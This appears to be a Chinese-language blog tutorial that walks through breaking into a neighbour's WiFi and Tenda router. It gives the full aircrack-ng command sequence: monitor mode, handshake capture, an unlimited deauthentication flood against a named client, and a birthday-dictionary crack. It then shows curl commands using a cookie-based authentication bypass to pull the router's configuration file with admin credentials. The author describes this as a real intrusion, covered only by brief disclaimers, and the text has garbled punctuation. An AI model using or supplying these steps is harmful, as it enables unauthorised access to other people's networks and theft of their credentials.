大家好,,今天是網(wǎng)絡(luò)安全的話題,內(nèi)容很入門,,高手可以直接跳過,。 本文章只供大家學(xué)習(xí)之用,請不要以身試法,,否則后果自負(fù),。 1.獲取WiFi密碼 首先我們要獲取WiFi密碼,需要用到一張無線網(wǎng)卡(本人用RT3070),、Aircrack-ng工具,、密碼字典。
(1). sudo airmon-ng 查看自己的無線網(wǎng)卡接口名字,,我的叫wlx983f9f182782 (2). sudo airmon-ng start wlx983f9f182782 開始監(jiān)控自己的無線網(wǎng)卡,,執(zhí)行完這條命令后它會給你一個(gè)監(jiān)控接口(這里是wlan0mon) (3). sudo airodump-ng wlan0mon 截取隔壁家的wifi信號,今天我們要入侵的叫Tenda_243F00的路由器,,它的bssid是C8:3A:35:24:3F:00,,channel在10號 (4). sudo airodump-ng --bssid C8:3A:35:24:3F:00 -c 10 -w tenda wlan0mon 這條命令的意思是獲取這個(gè)指定路由的握手碼(里面含加密的WiFi密碼),獲取的數(shù)據(jù)將輸出到名為tenda的文件里(-w tenda,,名字可以隨便改),,現(xiàn)在可以下一步,進(jìn)行下一步時(shí)這個(gè)窗口請暫時(shí)不要關(guān)閉 (5). sudo aireplay-ng -0 0 -a C8:3A:35:24:3F:00 -c 60:21:01:3B:03:71 wlan0mon 這條命令是偽裝成路由器發(fā)送請求給該路由器的用戶(60:21:01:3B:03:71這就是用戶),,從而獲取握手碼(-0 后面的參數(shù)的指定次數(shù),,0為無限次),直到(4)的窗口右上角出現(xiàn)了handshake:C8:3A:35:24:3F:00(代表你已經(jīng)獲取了加密過的密碼,,下一步就是解密了),,就能把所有窗口關(guān)閉 這個(gè)就是含有加密密碼的文件 (6). sudo aircrack-ng -w bir.txt tenda-01.cap 開始解密,請選用適合自己的一部字典,,在這里我就選用了bir.txt這部字典,,代表生日的意思,,很多人的WiFi都喜歡用自己生日作為密碼。不夠兩秒鐘的時(shí)間,,密碼就出現(xiàn)在我眼前了,。由于是真實(shí)入侵的原因,我要把密碼屏蔽掉,。 你現(xiàn)在可以使用這密碼成功登入WiFi了,! 2. 現(xiàn)在是第二步,獲取控制權(quán),,能不能獲取到取決于你能不能發(fā)現(xiàn)這個(gè)路由的漏洞,,本次例子是用騰達(dá)路由,我恰好在網(wǎng)上看到了關(guān)于他的漏洞的文章,,入侵變得唾手可得了,。 (1). 大部分的路由管理網(wǎng)面都在網(wǎng)段的最前面,比如192.168.0.1,,192.168.1.1,。這里我就不多說了,你可以用ifconfig命令查看下路由的網(wǎng)段,。我這個(gè)例子是192.168.0.1 (2). 這個(gè)路由有個(gè)漏洞很搞笑,,只要你加入cookie: admin:language=cn就能直接繞過后臺登入,直接獲取管理員權(quán)限,,我們馬上用curl發(fā)個(gè)請求去http://192.168.0.1/index.asp這個(gè)管理員頁面試試,,“curl -H cookie:'admin:language=cn' http://192.168.0.1/index.asp”,果真能繞過登入界面獲取最高權(quán)限,。好了,,現(xiàn)在是重頭戲來了,既然我們獲取權(quán)限,,我們就能拿到路由備份的管理員密碼,,這個(gè)路由的備份在/cgi-bin/DownloadCfg/RouterCfm.cfg,我們試試“curl -H cookie:'admin:language=cn' http://192.168.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg | grep http”,,最后,,賬號和密碼都展現(xiàn)在了我們眼前。 再三警告,!別干壞事,! |
|